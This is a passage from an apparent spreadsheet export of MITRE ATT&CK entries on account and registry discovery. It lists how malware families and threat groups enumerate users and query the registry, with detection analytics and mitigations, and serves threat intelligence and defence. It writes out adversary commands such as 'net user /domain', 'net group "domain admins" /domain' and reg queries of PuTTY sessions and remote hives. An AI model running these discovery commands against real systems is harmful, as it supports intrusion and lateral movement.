[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain users.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Cybereason Bumblebee August 2022)(Citation: Symantec Bumblebee June 2022)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) gathers domain and account names/information through process monitoring.(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has the ability to identify domain administrator accounts.(Citation: NCC Group Team9 June 2020)(Citation: DFIR Ryuk's Return October 2020)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can utilize `net use` commands to identify domain users.(Citation: Microsoft BlackCat Jun 2022)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain users, including identification of domain admin accounts.(Citation: CrowdStrike BloodHound April 2018)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.(Citation: MSTIC Nobelium Toolset May 2021)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use LDAP queries, `net group "Domain Admins" /domain` and `net user /domain` for discovery.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine if the user on an infected machine is in the admin or domain admin group.(Citation: Cyberreason Anchor December 2019)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the domain user accounts on a targeted system.(Citation: CME Github September 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)(Citation: SecureWorks August 2019)
IceApple
The [IceApple](https://attack.mitre.org/software/S1022) Active Directory Querier module  can perform authenticated requests against an Active Directory server.(Citation: CrowdStrike IceApple May 2022)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) can query LDAP to identify additional users on the network to infect.(Citation: IBM IcedID November 2017)
Net
[Net](https://attack.mitre.org/software/S0039) commands used with the &lt;code&gt;/domain&lt;/code&gt; flag can be used to gather information about and manipulate user accounts on the current domain.(Citation: Microsoft Net)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) enumerates local and domain users(Citation: Symantec Buckeye)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may collect user account information by running &lt;code&gt;net user /domain&lt;/code&gt; or a series of other commands on a victim.(Citation: FireEye APT34 Dec 2017)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can enumerate local and domain user account information.(Citation: GitHub PoshC2)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `System.Security.AccessControl` namespaces to retrieve domain user information.(Citation: GitHub SILENTTRINITY Modules July 2019)  
SoreFang
[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain accounts via &lt;code&gt;net.exe user /domain&lt;/code&gt;.(Citation: CISA SoreFang July 2016)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) enumerates user accounts of the domain.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net group "domain admins" /domain&lt;/code&gt; to display accounts in the "domain admins" permissions group and &lt;code&gt;net localgroup "administrators"&lt;/code&gt; to list local system administrator group membership.(Citation: AlienVault Sykipot 2011)
Valak
[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)
dsquery
[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on user accounts within a domain.(Citation: TechNet Dsquery)(Citation: Mandiant APT41)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for execution of commands and arguments associated with enumeration or information gathering of local accounts and groups such as &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net account&lt;/code&gt;, &lt;code&gt;net localgroup&lt;/code&gt;, &lt;code&gt;Get-LocalUser&lt;/code&gt;, and &lt;code&gt; dscl&lt;/code&gt;.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
File Access
Monitor access to file resources that contain local accounts and groups information such as &lt;code&gt;/etc/passwd&lt;/code&gt;, &lt;code&gt;/Users&lt;/code&gt; directories, and the Windows SAM database. 
If access requires high privileges, look for non-admin objects (such as users or processes) attempting to access restricted file resources.
Group Enumeration
Monitor for logging that may suggest a list of available groups and/or their associated settings has been extracted, ex. Windows EID 4798 and 4799.
OS API Execution
Monitor for API calls (such as &lt;code&gt;NetUserEnum()&lt;/code&gt;) that may attempt to gather local accounts information such as type of user, privileges and groups.
Process Creation
Monitor for processes that can be used to enumerate user accounts and groups such as &lt;code&gt;net.exe&lt;/code&gt; and &lt;code&gt;net1.exe&lt;/code&gt;, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Note: Event IDs are for Sysmon (Event ID 10 - process access) and Windows Security Log (Event ID 4688 - a new process has been created). 
- For Linux, auditing frameworks such as the Linux Auditing System (auditd) can be used to alert on the enumeration/reading of files that store local users, including &lt;code&gt;/etc/passwd&lt;/code&gt;. 
- For MacOS, utilities that work in concert with Apple’s Endpoint Security Framework such as Process Monitor can be used to track usage of commands such as &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;.
&lt;h4&gt;Analytic 1 - Net Discovery Commands &lt;/h4&gt;
&lt;code&gt;processes = filter processes where ((event_id="10" OR event_id="4688") AND
 exe == "net.exe" OR exe == "net1.exe")&lt;/code&gt;
Operating System Configuration
Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located at &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: Enumerate administrator accounts on elevation.(Citation: UCF STIG Elevation Account Enumeration)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net user` command to gather account information.(Citation: Cybereason OperationCuckooBees May 2022)
APT1
[APT1](https://attack.mitre.org/groups/G0006) used the commands &lt;code&gt;net localgroup&lt;/code&gt;,&lt;code&gt;net user&lt;/code&gt;, and &lt;code&gt;net group&lt;/code&gt; to find accounts on the system.(Citation: Mandiant APT1)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has used a tool that can obtain info about local and global group users, power users, and administrators.(Citation: Symantec Buckeye)
APT32
[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users using the commands &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net user&lt;/code&gt; for account discovery.(Citation: NCC Group Chimera January 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed ntuser.dat and UserClass.dat on compromised hosts.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs account discovery using commands such as &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net group "REDACTED" /domain&lt;/code&gt; on specific permissions groups.(Citation: Mandiant Operation Ke3chang November 2014)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has collected the administrator username from a compromised host.(Citation: Checkpoint MosesStaff Nov 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net user /domain&lt;/code&gt;, &lt;code&gt;net group “domain admins” /domain&lt;/code&gt;, and &lt;code&gt;net group “Exchange Trusted Subsystem” /domain&lt;/code&gt; to get account listings on a victim.(Citation: Palo Alto OilRig May 2016)
Poseidon Group
[Poseidon Group](https://attack.mitre.org/groups/G0033) searches for administrator accounts on both the local victim machine and the network.(Citation: Kaspersky Poseidon Group)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used &lt;code&gt;net user&lt;/code&gt; to conduct internal discovery of systems.(Citation: SecureWorks BRONZE UNION June 2017)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used &lt;code&gt;net user&lt;/code&gt; to enumerate local accounts on the system.(Citation: ESET ComRAT May 2020)(Citation: ESET Crutch December 2020)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following commands following exploitation of a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to enumerate user accounts: &lt;code&gt;net user &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;net user /domain &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) gathers domain and account names/information through process monitoring.(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can identify administrator accounts on an infected host.(Citation: NCC Group Team9 June 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate the sessions for each user logged onto the infected host.(Citation: Crowdstrike Indrik November 2018)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can identify users with local administrator rights.(Citation: CrowdStrike BloodHound April 2018)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: Palo Alto Comnie)
Duqu
The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on accounts and permissions.(Citation: Symantec W32.Duqu)
Elise
[Elise](https://attack.mitre.org/software/S0081) executes &lt;code&gt;net user&lt;/code&gt; after initial communication is made to the remote server.(Citation: Lotus Blossom Jun 2015)
Empire
[Empire](https://attack.mitre.org/software/S0363) can acquire local and domain user account information.(Citation: Github PowerShell Empire)
Epic
[Epic](https://attack.mitre.org/software/S0091) gathers a list of all user accounts, privilege classes, and time of last logon.(Citation: Kaspersky Turla Aug 2014)
GeminiDuke
[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on local user accounts from the victim.(Citation: F-Secure The Dukes)
HyperStack
[HyperStack](https://attack.mitre.org/software/S0537) can enumerate all account names on a remote share.(Citation: Accenture HyperStack October 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has a command to list account information on the victim’s machine.(Citation: ESET InvisiMole June 2018)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) gathers information on local groups and members on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of accounts with the command &lt;code&gt;net users&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about users on remote hosts.(Citation: FireEye Periscope March 2018)
Milan
[Milan](https://attack.mitre.org/software/S1015) has run `C:\Windows\system32\cmd.exe /c cmd /c dir c:\users\ /s 2&gt;&amp;1` to discover local accounts.(Citation: ClearSky Siamesekitten August 2021)
Mis-Type
[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c net user {Username}&lt;/code&gt;.(Citation: Cylance Dust Storm)
Net
Commands under &lt;code&gt;net user&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about and manipulate user accounts.(Citation: Savill 1999)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) enumerates local and domain users(Citation: Symantec Buckeye)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can display the /etc/passwd file on a compromised host.(Citation: ANSSI Sandworm January 2021)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve usernames from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can gather user names.(Citation: Morphisec ShellTea June 2019)
Pony
[Pony](https://attack.mitre.org/software/S0453) has used the &lt;code&gt;NetUserEnum&lt;/code&gt; function to enumerate local accounts.(Citation: Malwarebytes Pony April 2016)	
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) can enumerate local and domain user account information.(Citation: GitHub PoshC2)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenGroup&lt;/code&gt; Privesc-PowerUp module can enumerate all SIDs associated with its current token.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.(Citation: GitHub Pupy)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: RATANKBA)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of users.(Citation: Kaspersky ProjectSauron Technical Analysis)
S-Type
[S-Type](https://attack.mitre.org/software/S0085) has run the command `net user` on a victim.(Citation: Cylance Dust Storm)
SHOTPUT
[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to retrieve information about connected users.(Citation: Palo Alto CVE-2015-3113 July 2015)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;net.exe user&lt;/code&gt; and &lt;code&gt;net.exe users&lt;/code&gt; to enumerate local accounts on a compromised host.(Citation: FireEye SMOKEDHAM June 2021)
SoreFang
[SoreFang](https://attack.mitre.org/software/S0516) can collect usernames from the local system via &lt;code&gt;net.exe user&lt;/code&gt;.(Citation: CISA SoreFang July 2016)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) enumerates user accounts of the local host.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) collects the users of the system.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)
USBferry
[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net user&lt;/code&gt; to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)	
Valak
[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Note: For PowerShell Module logging event id 4103, enable logging for module Microsoft.PowerShell.Management. The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such a registry key (PSProvider “Registry”). The the Get-ChildItem gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations.
&lt;h4&gt; Analytic 1 - Suspicious Commands &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter command_line where
  EventId == "4103" AND
  (CommandName LIKE '%New-PSDrive%' AND 
       (CommandParameterValue LIKE ‘%Registry%’ OR
        CommandParameterValue LIKE '%HKEY_CLASSES_ROOT%' OR
        CommandParameterValue LIKE '%HKCR%')) &lt;/code&gt;
OS API Execution
Monitor for API calls (such as &lt;code&gt;RegOpenKeyExA&lt;/code&gt;) that may interact with the Windows Registry to gather information about the system, configuration, and installed software. OS API calls associated with querying the Windows Registry are RegOpenKeyEx , RegOpenUserClassesRoot, RegQueryValueExA, and RegQueryValueExW. Execution of these functions might trigger security log ids such as 4663 (Microsoft Security Auditing). Also monitor for RegOpenUserClassesRoot api to retrieve a handle to the HKEY_CLASSES_ROOT key for a specified user. The returned key has a view of the registry that merges the contents of the HKEY_LOCAL_MACHINE\Software\Classes key with the contents of the Software\Classes keys in the user's registry hive.
Note: Most EDR tools do not support direct monitoring of API calls due to the sheer volume of calls produced by an endpoint but may have alerts or events that are based on abstractions of OS API calls.
&lt;h4&gt; Analytic 1 - Suspicious API Calls&lt;/h4&gt;
&lt;code&gt;suspicious_apis = filter api_calls where
  ApiName LIKE '%RegOpenKeyEx%' OR
  ApiName LIKE '%RegOpenUserClassesRoot%'&lt;/code&gt;
Process Creation
Monitor for newly executed processes that may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Note: The New-PSDrive PowerShell cmdlet creates temporary and persistent drives that are mapped to or associated with a location in a data store, such a registry key (PSProvider “Registry”). The Get-ChildItem gets the items in one or more specified locations. By using both, you can enumerate COM objects in one or more specified locations.
Note for Analytic 3: Replace FilePathToLolbasProcessXX.exe with lolBAS process names that are used by your organization. The number_standard_deviations parameter should be tuned accordingly. Identifying outliers by comparing distance from a data point to the average value against a certain number of standard deviations is recommended for data values that are symmetrical distributed. If your data is not distributed, try a different algorithm such as the Interquartile Range (IQR).
&lt;h4&gt; Analytic 1 - Suspicious Processes with Registry keys &lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (EventId == "1" OR EventId == "4688") AND((ProcessCommandLine LIKE '%reg%' AND ProcessCommandLine LIKE '%query%') OR (ProcessCommandLine LIKE '%Registry%' AND (ProcessCommandLine LIKE '%HKEY_CLASSES_ROOT%' OR ProcessCommandLine '%HKCR%'))) &lt;/code&gt;
&lt;h4&gt; Analytic 2 - reg.exe spawned from suspicious cmd.exe &lt;/h4&gt;
&lt;code&gt;reg_processes = filter processes where (EventId == "1" OR EventId == "4688") AND (ProcessFilePath LIKE '%reg.exe%' AND ProcessParentFilePath LIKE '%cmd.exe%')
cmd_processes = filter command_line where (event_id == "1" OR event_id == "4688") AND (ProcessFilePath LIKE '%cmd.exe%' AND ProcessParentFilePath NOT LIKE '%explorer.exe%') 
suspicious_processes = 
SELECT r.ProcessGuid, r.ProcessFilePath, c.ProcessFilePath AS ProcessParentFilePath
FROM reg_processes r
INNER JOIN cmd_processes c
ON r.ProcessParentGuid = c.ProcessGuid &lt;/code&gt;
&lt;h4&gt;Analytic 3 - Rare LolBAS command lines&lt;/h4&gt;
&lt;code&gt;count_lolbas_processes = filter processes where (EventId == "1" OR EventId == "4688") AND ProcessFilePath IN ('FilePathToLolbasProcess01.exe','FilePathToLolbasProcess02.exe')
GROUP BY ProcessFilePath
number_standard_deviations = 1.5
suspicious_processes = 
SELECT ProcessFilePath, ProcessCount, 
       AVG(ProcessCount) Over() - STDEV(ProcessCount) Over() * number_standard_deviations as LowerBound 
FROM count_lolbas_processes
WHERE
  ProcessCount &lt; LowerBound &lt;/code&gt;
Windows Registry Key Access
Monitor for unexpected process interactions with the Windows Registry (i.e. reads) that may be related to gathering information.
Note: For Security Auditing event ids 4656 and 4663, a System Access Control List (SACL) that controls the use of specific access rights such as Enumerate sub-keys and Query key value is required for event generation. Depending on the Registry key you are monitoring, the implementation of a new System Access Control List (SACL) might be required. Depending of Registry key used for the creation of a System Access Control List (SACL), the generation of event ids 4656 and 4663 might be noisy.
&lt;h4&gt; Analytic 1 - Suspicious Registry&lt;/h4&gt;
&lt;code&gt;suspicious_registry = filter registry where
  (event_id == "4663" OR event_id == "4656") AND
  ObjectType == "Key" AND
  RegistryKeyPath LIKE '%SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall%' AND 
  (UserAccessList LIKE '%4435%' OR UserAccessList LIKE '%Enumerate sub-keys%' OR
  UserAccessList LIKE '%4432%' OR UserAccessList LIKE '%Query key value%') AND
  ProcessFilePath NOT IN ('FilePathToExpectedProcess01.exe','FilePathToExpectedProcess02.exe')&lt;/code&gt;
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), the threat actors executed `/c cd /d c:\windows\temp\ &amp; reg query HKEY_CURRENT_USER\Software\&lt;username&gt;\PuTTY\Sessions\` to detect recent PuTTY sessions, likely to further lateral movement.(Citation: FoxIT Wocao December 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor can query the Windows Registry to gather system information. (Citation: ESET OceanLotus Mar 2019)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used various strains of malware to query the Registry.(Citation: FBI FLASH APT39 September 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has queried Registry keys using &lt;code&gt;reg query \\&lt;host&gt;\HKU\&lt;SID&gt;\SOFTWARE\Microsoft\Terminal Server Client\Servers&lt;/code&gt; and &lt;code&gt;reg query \\&lt;host&gt;\HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has queried the Registry to identify victim information.(Citation: US-CERT TA18-074A)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed Registry hives ntuser.dat and UserClass.dat.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has obtained specific Registry keys and values on a compromised host.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample checks for the presence of the following Registry key:&lt;code&gt;HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt&lt;/code&gt;.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used &lt;code&gt;reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”&lt;/code&gt; on a victim to query the Registry.(Citation: Palo Alto OilRig May 2016)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware attempts to determine the installed version of .NET by querying the Registry.(Citation: Citizen Lab Stealth Falcon May 2016)
Threat Group-3390
A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can read and decrypt stored Registry values.(Citation: Nccgroup Emissary Panda May 2018)
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover information in the Windows Registry with the &lt;code&gt;reg query&lt;/code&gt; command.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes .(Citation: ESET Turla PowerShell May 2019)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has queried the Registry on compromised systems, `reg query hklm\software\`, for information on installed software.(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to query the Registry for proxy settings.(Citation: Zscaler APT31 Covid-19 October 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can enumerate registry keys.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)
Attor
[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can check for installed software on the system under the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Uninstall&lt;/code&gt;.(Citation: Unit42 Azorult Nov 2018)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of enumerating and making modifications to an infected system's Registry.(Citation: FireEye APT30)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;reg query&lt;/code&gt; command for &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;.(Citation: Unit42 BabyShark Feb 2019)	
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) searches for certain Registry keys to be configured before executing the payload.(Citation: US-CERT Bankshot Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can query &lt;code&gt;Windows\CurrentVersion\Uninstall&lt;/code&gt; for installed applications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) can query the host's Registry key at &lt;code&gt;HKEY_CURRENT_USER\Console\QuickEdit&lt;/code&gt; to retrieve data.(Citation: Unit42 BendyBear Feb 2021)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used the RegQueryValueExA function to retrieve proxy information in the Registry.(Citation: Talos Bisonal Mar 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can use the RegEnumKeyW to iterate through Registry keys.(Citation: Crowdstrike Indrik November 2018) 
Brave Prince
[Brave Prince](https://attack.mitre.org/software/S0252) gathers information about the Registry.(Citation: McAfee Gold Dragon)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can check the Registry for specific keys.(Citation: Medium Ali Salem Bumblebee April 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) provides access to the Windows Registry, which can be used to gather information.(Citation: FireEye APT28)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) checks the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings&lt;/code&gt; for proxy configurations information.(Citation: FireEye CARBANAK June 2017)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has searched the Image File Execution Options registry key for "Debugger" within every subkey.(Citation: Prevx Carberp March 2011)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) enumerates values in the Registry.(Citation: ESET Carbon Mar 2017)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) contains watchdog functionality that periodically ensures &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load&lt;/code&gt; is set to point to its executable.(Citation: PaloAlto CardinalRat Apr 2017)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) has the ability to enumerate `Uninstall` registry values.(Citation: Check Point APT35 CharmPower January 2022)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to enumerate Registry keys, including &lt;code&gt;KEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir&lt;/code&gt; to search for a bitcoin wallet.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can query &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt;  to determine if the security setting for restricting default programmatic access is enabled.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying &lt;code&gt;HKCR\http\shell\open\command&lt;/code&gt;.(Citation: ESET ComRAT May 2020)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can check the Registry for the presence of &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate&lt;/code&gt; to determine how long it has been installed on a host.(Citation: Proofpoint Operation Transparent Tribe March 2016)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can query the Registry to determine if it has already been installed on the system.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) queries the Registry for keys and values.(Citation: Cybereason Cobalt Kitty 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of enumerating Registry keys and values.(Citation: FireEye Periscope March 2018)
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) searches and reads the value of the Windows Update Registry Run key.(Citation: ClearSky Charming Kitten Dec 2017)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.(Citation: CyberBit Dtrack)
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;rem reg query&lt;/code&gt; command to obtain values from Registry keys.(Citation: Kaspersky Turla)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) queries the Registry for specific keys for potential privilege escalation and proxy information. [FELIXROOT](https://attack.mitre.org/software/S0267) has also used WMI to query the Windows Registry.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can get user agent strings for the default browser from &lt;code&gt;HKCU\Software\Classes\http\shell\open\command&lt;/code&gt;.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) queries Registry values as part of its anti-sandbox checks.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can check `Software\Microsoft\Windows\CurrentVersion\Internet Settings` to extract the `ProxyServer` string.(Citation: Bitdefender FunnyDream Campaign November 2020)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can open random files and Registry keys to obscure malware behavior from sandbox analysis.(Citation: ESET Gelsemium June 2021)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) enumerates registry keys with the command &lt;code&gt;regkeyenum&lt;/code&gt; and obtains information for the Registry key &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: McAfee Gold Dragon)
HOPLIGHT
